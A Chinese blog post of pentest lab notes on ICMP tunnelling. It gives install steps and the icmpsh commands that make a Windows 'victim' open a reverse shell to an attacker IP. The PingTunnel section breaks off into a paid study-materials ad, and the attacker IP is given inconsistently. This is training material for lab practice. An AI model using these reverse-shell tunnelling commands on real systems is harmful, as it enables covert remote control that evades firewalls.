【渗透测试笔记】之【内网渗透——网络层隧道(icmpsh、PingTunnel的使用:icmp隧道反向shell(1)

最新推荐文章于 2024-07-25 11:12:43 发布
最新推荐文章于 2024-07-25 11:12:43 发布
阅读量237 收藏 5
点赞数 7
分类专栏: 程序员 文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84971029/article/details/138793933
版权
目录

1. ICMP隧道

1.1 icmpsh本地端口转发

实验环境:
kali(攻击机):192.168.8.48
Windows2012(受害机):192.168.8.18

1.1.1 下载与部署
kali(需要python2环境)
curl https://bootstrap.pypa.io/pip/2.7/get-pip.py -o get-pip.py
python get-pip.py
# 安装python2pip

git clone https://github.com/CoreSecurity/impacket.git
cd impacket/
pip install .
# 安装python-impacket类库

sysctl -w net.ipv4.icmp_echo_ignore_all=1
# 关闭icmp应答,0为开启

git clone https://github.com/bdamele/icmpsh.git
# 下载icmpsh
1.1.2 使用方法
kali
cd icmpsh
python icmpsh_m.py 192.168.8.35(攻击者IP) 192.168.8.18(受害者IP)

在这里插入图片描述
此时会等待回连。

Windows2012
icmpsh.exe -t 192.168.8.35(攻击者IP) -d 500 -b 30 -s 128

参数说明:

-t:攻击者IP,必选
-r:用于测试
-d:请求延迟(毫秒)
-o:响应超时(毫秒)
-b:空格数限制
-s:字节最大数据缓冲区大小(以字节为单位)

在这里插入图片描述

1.1.3 效果演示

执行后成功回连:
在这里插入图片描述

1.2 PingTunnel本地端口转发

实验环境:
kali(攻击机):192.168.8.48
CentOS7(边界服务器,跳板机):192.168.8.35
Windows2012(内网服务器):10.1.1.10

1.2.1 下载与部署
kali

方式一:直接安装

apt install ptunnel -y

方式二:官网下载安装

apt install flex bison -y
## 最后

**自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。**

**深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**

**因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**

![img](https://img-blog.csdnimg.cn/img_convert/d391c964d3a9969ac98d9ea73202a6e0.png)

![img](https://img-blog.csdnimg.cn/img_convert/ae67eb6d44971c03d0faf7325aa00521.png)

![img](https://img-blog.csdnimg.cn/img_convert/d5ed0e8849080c3fc1a33befef7e97cc.png)

![img](https://img-blog.csdnimg.cn/img_convert/d721426b19f9f2b0d4a1125e593065eb.png)

![img](https://img-blog.csdnimg.cn/img_convert/0b97416e74d80fe8a98b5623f700b72a.png)

 

**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!**

[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)

**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**

!真正的体系化!**

[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)

**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**
2401_84971029
关注
  • 7
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
icmp回复报文_安全实验室 | 内网渗透—利用ICMP实现命令控制
weixin_31270363的博客
01-09 451
渗透测试中我们经常会发现一个现象,有些服务器禁用了PING命令甚至是整个ICMP协议,而且这一现象在越是大型的企业中越是明显。可能你会问对于一个小小的ICMP协议来说这有必要吗,答案显然是肯定的。在以前ICMP协议可以说是十分不起眼,但就是让所有人都放松戒备的ICMP协议却成为了攻击者手中的利器。本期美创安全实验室将给大家介绍如何利用ICMP进行命令控制与搭建隐蔽隧道。Part 1IC...
渗透测试入门——渗透测试笔记
01-27
CMS同样能在网上找到许多漏洞,常用作渗透测试的练习靶机。根据提示,第1题要求找到咨询平台的管理员账号密码;第2题需要登录服务器后台,并插入木马,再用中国菜刀连接,继而找到在管理员桌面上的 flag文件;第3题...
icmp隧道的利用
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
03-08 8022
icmp隧道的利用
内网渗透(二)——ICMP隧道搭建
qq_61562251的博客
12-10 632
ICMP隧道防⽕墙没有开放任何端⼝,但是icmp消息不使用端口号,而是通过IP头部中的协议字段来识别。在一些网络环境中,如果不经过认证,TCP和UDP数据包都会被拦截。如果用户可以ping通远程计算机,就可以尝试建立ICMP隧道,将TCP数据通过该隧道发送,实现不受限的网络访问。1、工具:pingtunnelimcptunnel可以将IP流量封装进ICMPping数据包中,旨在利用ping穿透防火墙的检测,因为通常防火墙是不会屏蔽ping数据包的。
内网渗透系列:内网隧道ICMP隧道
闵行小鱼塘
07-06 3026
最近开始研究隧道相关,如前做了个整理——内网渗透系列:内网穿透(隧道)学习,本篇专门来学习ICMP隧道
内网渗透—利用ICMP实现命令控制
weixin_41666796的博客
03-18 153
有时,网络管理员会使渗透测试人员的生活变得更加艰难。令人惊讶的是,其中一些确实将防火墙用于其用途!这些情况之一就是只允许流量进入已知的机器,端口和服务(入口过滤)并设置强大的出口访问控制列表。在这种情况下,当您拥有内部网络或DMZ的机器部分时(例如,在Citrix Breakout或类似活动中),通过TCP获得反向Shell而不考虑绑定Shell并不总是那么简单。 但是,使用UDP(通常是DNS隧道)或ICMP作为获取反向Shell通道呢?ICMP是此工具的重点。 https://github.com/b
Python之渗透测试笔记(五) ——Requests模块
12-21
Requests模块是Python编程中用于发送HTTP请求的重要第三方库,它为开发者提供了简洁、直观的接口,使得处理HTTP请求...无论是在Web开发、自动化测试还是渗透测试中,Requests都能极大地简化网络数据的获取和处理过程。
读书笔记之红蓝对抗解密渗透测试与网络安全建设.docx
03-27
读书笔记之红蓝对抗解密渗透测试与网络安全建设.docx
渗透测试学习笔记之案例一.pdf
04-06
### 渗透测试学习笔记之案例一 #### 1. 前言 在渗透测试领域,持续的技术积累和实战经验分享对于个人成长至关重要。本文档记录了一个具体的渗透测试案例,旨在通过实战演练来加深对渗透测试技术的理解,并为后续的...
网络安全-渗透完整笔记
03-27
网络扫描是渗透测试的重要环节,包括基于UDP、ARP、NetBIOS、SNMP、ICMP、SMB等多种协议发现内网存活主机的方法。在攻击过程中,可能需要利用Web程序的敏感目录,或者通过Mysql、Sql server服务进行攻击,结合Sqlmap...
内网渗透系列:内网隧道icmp_tran
闵行小鱼塘
04-10 6567
本文研究ICMP隧道的一个工具,icmp_tran
vite5+vue3开发阅读APP实战笔记20240725
最新发布
Python私教
07-25 410
修改src/page/home/index.vue,使用组件和API。注意,这里无论是组件还是API,都不需要我们手动引入,我们配置了自动导入以后,vite会帮我们自动导入。创建 src/page/home/index.vue。修改 vite.config.js。修改vite.config.js。修改 src/main.js。修改src/App.vue。
学习笔记-系统框图传递函数公式推导
weixin_45875994的博客
07-24 810
输出C(s)是前向路径(通过G(s))的输出与反馈路径(通过H(s))的输出之差(在负反馈系统中)。因此,我们可以写出以下关系式:这里,G(s)R(s)是前向路径的输出,而G(s)H(s)C(s)是反馈路径的输出(注意,反馈路径的输出先经过H(s),再与前向路径的输出相减)。
Typora笔记上传到CSDN
m0_48362854的博客
07-25 539
我花了一个小时弄这个 找了很多csdn的笔记 都弄完感觉最方便的还是直接在csdn上写(因为有的之前不是用的阿里云oss 而是gitee 免费仓库 但是好像后来不能使用了 就会导致你上传的笔记图片不显示 很麻烦 使用阿里云或者腾讯云的话 需要花钱 虽然两块钱用一年 但是感觉也是很麻烦 不如直接在网页上写写算了 当然如果笔记图片很多的 还是建议配置一下 )参考这个配置完阿里云oss 没什么问题 但是PicGo也是参考他的 因为版本是旧的 可以点击我下边的官方链接下载。图片的链接是本地的 当然没法显示。
SAP PP学习笔记31 - 计划运行的步骤2 - Scheduling(日程计算),BOM Explosion(BOM展开)
shi_ly的专栏
07-24 781
本章主要讲Scheduling(日程计算),其中包括 外部调达中的调度,生产订单中的调度,修改需求日期(其实就是在物料中增加安全时间和BOM中的提前期偏置量)。另外还讲了BOM展开的内容,详细讲了BOM选择的各种方法,除了按数量选BOM之外,还有其他比如 按日期,按生产版本等,而其中按日期又分为按订单开始日期,订单终了日期等,越趋复杂。
InternLM学习笔记
haveanybody的博客
07-24 241
【代码】InternLM学习笔记
7-23学习笔记
L14173233的博客
07-23 655
/检查性异常 是Exception的直接子类创建对象的方法1 new2 克隆3 反序列化4 反射。
【学习笔记】子集DP
Brute♂force
07-24 958
有一类问题和子集有关。给你一个集合S,令T为S的超集,也就是S所有子集的集合,求T中所有元素的和。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值